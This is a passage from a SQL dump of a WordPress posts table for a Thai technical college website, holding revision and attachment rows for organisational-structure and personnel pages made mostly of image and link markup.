'1451-revision-v1', '', '', '2018-03-07 10:06:06', '2018-03-07 03:06:06', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1587, 3, '2018-03-07 10:08:12', '2018-03-07 03:08:12', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1469 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1472 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1477 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1482 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" /></a>\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1483\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1492 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-22.jpg\" alt=\"\" width=\"191\" height=\"236\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1494 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-36-36.jpg\" alt=\"\" width=\"496\" height=\"330\" />\r\n\r\n<a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1495 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1502 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1504\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"290\" height=\"347\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-07 10:08:12', '2018-03-07 03:08:12', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1588, 3, '2018-03-07 10:09:52', '2018-03-07 03:09:52', ' \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'publish', 'closed', 'closed', '', '%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b9%81%e0%b8%a5%e0%b8%b0', '', '', '2020-11-04 09:56:14', '2020-11-04 02:56:14', '', 0, 'http://www.technicrayong.ac.th/?page_id=1588', 0, 'page', '', 0),
(1589, 3, '2018-03-07 10:09:52', '2018-03-07 03:09:52', '', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1588-revision-v1', '', '', '2018-03-07 10:09:52', '2018-03-07 03:09:52', '', 1588, 'http://www.technicrayong.ac.th/1588-revision-v1/', 0, 'revision', '', 0),
(1590, 3, '2018-03-07 11:39:13', '2018-03-07 04:39:13', '', '5-3-2561 12-44-12', '', 'inherit', 'closed', 'closed', '', '5-3-2561-12-44-12', '', '', '2018-03-07 11:39:13', '2018-03-07 04:39:13', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg', 0, 'attachment', 'image/jpeg', 0),
(1591, 3, '2018-03-07 11:39:52', '2018-03-07 04:39:52', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1469 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1472 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1590 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"675\" height=\"311\" />\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1477 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1482 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" /></a>\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1483\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1492 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-22.jpg\" alt=\"\" width=\"191\" height=\"236\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1494 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-36-36.jpg\" alt=\"\" width=\"496\" height=\"330\" />\r\n\r\n<a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1495 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1502 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1504\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"290\" height=\"347\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-07 11:39:52', '2018-03-07 04:39:52', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1592, 3, '2018-03-07 11:45:43', '2018-03-07 04:45:43', '', '5-3-2561 13-22-38', '', 'inherit', 'closed', 'closed', '', '5-3-2561-13-22-38', '', '', '2018-03-07 11:45:43', '2018-03-07 04:45:43', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg', 0, 'attachment', 'image/jpeg', 0),
(1593, 3, '2018-03-07 11:45:58', '2018-03-07 04:45:58', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1469 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1472 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1590 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"675\" height=\"311\" />\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1477 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1592 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"455\" height=\"323\" />\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1482 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" /></a>\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1483\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1492 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-22.jpg\" alt=\"\" width=\"191\" height=\"236\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1494 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-36-36.jpg\" alt=\"\" width=\"496\" height=\"330\" />\r\n\r\n<a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1495 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1502 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1504\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"290\" height=\"347\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-07 11:45:58', '2018-03-07 04:45:58', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1595, 3, '2018-03-07 12:52:31', '2018-03-07 05:52:31', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1456 \" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"369\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1594 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-12-52-34.jpg\" alt=\"\" width=\"899\" height=\"311\" />', 'งานบริหารงานทั่วไป', '', 'inherit', 'closed', 'closed', '', '1512-revision-v1', '', '', '2018-03-07 12:52:31', '2018-03-07 05:52:31', '', 1512, 'http://www.technicrayong.ac.th/1512-revision-v1/', 0, 'revision', '', 0),
(1596, 3, '2018-03-07 12:53:32', '2018-03-07 05:53:32', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1594 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-12-52-34.jpg\" alt=\"\" width=\"899\" height=\"311\" /><img class=\"aligncenter wp-image-1469 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1472 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1590 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"675\" height=\"311\" />\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1477 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1592 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"455\" height=\"323\" />\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1482 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" /></a>\r\n\r\n<a href=\"/งานพัสดุ\"><img class=\"aligncenter wp-image-1483\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1492 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-22.jpg\" alt=\"\" width=\"191\" height=\"236\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1494 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-36-36.jpg\" alt=\"\" width=\"496\" height=\"330\" />\r\n\r\n<a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1495 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1502 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1504\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"290\" height=\"347\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-07 12:53:32', '2018-03-07 05:53:32', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1597, 3, '2018-03-07 13:00:27', '2018-03-07 06:00:27', '', '7-3-2561 13-01-48', '', 'inherit', 'closed', 'closed', '', '7-3-2561-13-01-48', '', '', '2018-03-07 13:00:27', '2018-03-07 06:00:27', '', 1516, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-13-01-48.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1598, 3, '2018-03-07 13:00:49', '2018-03-07 06:00:49', '<img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467 \" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"365\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1597 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-01-48.jpg\" alt=\"\" width=\"731\" height=\"315\" />\r\n<h3><span style=\"color: #0000ff;\">**</span><span style=\"color: #0000ff;\">ข้อมูลบุคลากร ปี 2560 <a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A360/\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\r\n<h3><span style=\"color: #339966;\">**คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ </span><span style=\"color: #339966;\">และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ <a href=\"/คำสั่งแต่งตั้ง-2468-2560\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\r\n<h3><span style=\"color: #800080;\"><strong>**หลักเกณฑ์และวิธีปฏิบัติในการจัดข้าราชการเข้าพักอาศัยในที่พักของทางราชการ </strong></span><span style=\"color: #339966;\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></span></h3>\r\n \r\n\r\n ', 'งานบุคลากร', '', 'inherit', 'closed', 'closed', '', '1516-revision-v1', '', '', '2018-03-07 13:00:49', '2018-03-07 06:00:49', '', 1516, 'http://www.technicrayong.ac.th/1516-revision-v1/', 0, 'revision', '', 0),
(1599, 3, '2018-03-07 13:01:16', '2018-03-07 06:01:16', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-1594 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-12-52-34.jpg\" alt=\"\" width=\"899\" height=\"311\" /><img class=\"aligncenter wp-image-1469 size-full\" 